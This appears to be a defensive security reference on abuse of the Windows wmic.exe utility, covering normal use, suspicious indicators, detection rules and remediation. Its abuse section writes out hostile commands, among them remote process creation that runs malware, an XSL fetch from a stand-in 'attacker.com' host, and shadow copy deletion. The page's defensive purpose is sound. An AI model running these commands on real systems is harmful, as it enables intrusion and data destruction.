wmic.exeSYSTEM UTILITYwmic.exe - WMI Command Line Security Analysis
wmic.exe is the **WMI command-line interface** providing access to Windows Management Instrumentation. It is a **powerful LOLBin** used for **remote code execution**, **lateral movement**, **reconnaissance**, and **defense evasion**. While deprecated, wmic.exe remains highly abused in attack chains.
Risk Summary
CRITICAL priority for SOC triage. wmic.exe is a versatile LOLBin for execution, recon, and lateral movement. Commands like "process call create", "node:", and XSL execution are **strong indicators of malicious activity**. Note: Deprecated but still present on most systems.
Overview
What is wmic.exe?
wmic.exe is the command-line interface for Windows Management Instrumentation.
Core Functions
WMI Operations:
- System information queries
- Process management
- Remote system management
- Hardware/software inventory
Security Significance
- LOLBin Status: Extensive abuse capabilities
- Remote Execution: Execute code on remote systems
- Recon Tool: System enumeration
- Deprecated: Still present, still abused
Note: wmic.exe is deprecated in Windows 10 21H1+
Normal Behavior
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Windows\System32\wbem\WMIC.exe |
| Parent | cmd.exe, powershell.exe |
| User | Administrator |
| Context | System administration |
Legitimate Usage
wmic os get caption
wmic computersystem get model
Common Locations
C:\Windows\System32\wbem\WMIC.exeC:\Windows\SysWOW64\wbem\WMIC.exeSuspicious Indicators
Legitimate vs Suspicious
LEGITIMATE
Command: wmic os get caption
wmic computersystem list
Context: System inventory
SUSPICIOUS
Command: wmic process call create "cmd /c ..."
wmic /node:TARGET ...
wmic os get /format:xsl
Context: Process creation
Remote execution
XSL stylesheet abuse
High-Risk Commands
| Command | Risk | Purpose |
|---|---|---|
| process call create | CRITICAL | Execute code |
| /node: | CRITICAL | Remote execution |
| /format: (XSL) | CRITICAL | Code execution |
| shadowcopy delete | HIGH | Ransomware indicator |
Abuse Techniques
Attack Techniques
Technique #1: Local Process Creation (T1047)
wmic process call create "powershell -ep bypass -c IEX(...)"
Technique #2: Remote Execution (T1047)
wmic /node:TARGET /user:admin /password:pass process call create "cmd /c C:\malware.exe"
Technique #3: XSL Script Execution (T1220)
wmic os get /format:"http://attacker.com/malicious.xsl"
Technique #4: Reconnaissance (T1082)
wmic qfe list
wmic product get name
wmic useraccount list
Technique #5: Defense Evasion (T1490)
wmic shadowcopy delete
Detection Guidance
Detection Strategies
Priority #1: Process Creation
Process = "wmic.exe" AND
CommandLine CONTAINS "process call create"
→ ALERT: CRITICAL
Priority #2: Remote Node
Process = "wmic.exe" AND
CommandLine CONTAINS "/node:"
→ ALERT: CRITICAL - Remote WMI execution
Priority #3: XSL Abuse
Process = "wmic.exe" AND
CommandLine CONTAINS "/format:" AND
CommandLine CONTAINS ["http", ".xsl"]
→ ALERT: CRITICAL - XSL script execution
Sigma Rule:
title: WMIC Remote Process Creation
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: '\WMIC.exe'
CommandLine|contains|all:
- '/node:'
- 'process'
- 'call'
- 'create'
condition: selection
level: critical
Remediation Steps
Protection and Remediation
Defense: Disable WMIC
Remove wmic.exe (deprecated anyway):
dism /Online /Remove-Capability /CapabilityName:WMIC~~~~
Defense: Monitor WMI
Enable WMI activity logging.
If Compromise Suspected
- Review wmic command line
- Check for remote connections
- Identify created processes
- Hunt for lateral movement
- Check shadow copies status
Investigation Checklist
Investigation Checklist
- Review full command line
- Check for process creation
- Identify remote targets
- Check for XSL references
- Review spawned processes
- Check shadow copy status
- Hunt for lateral movement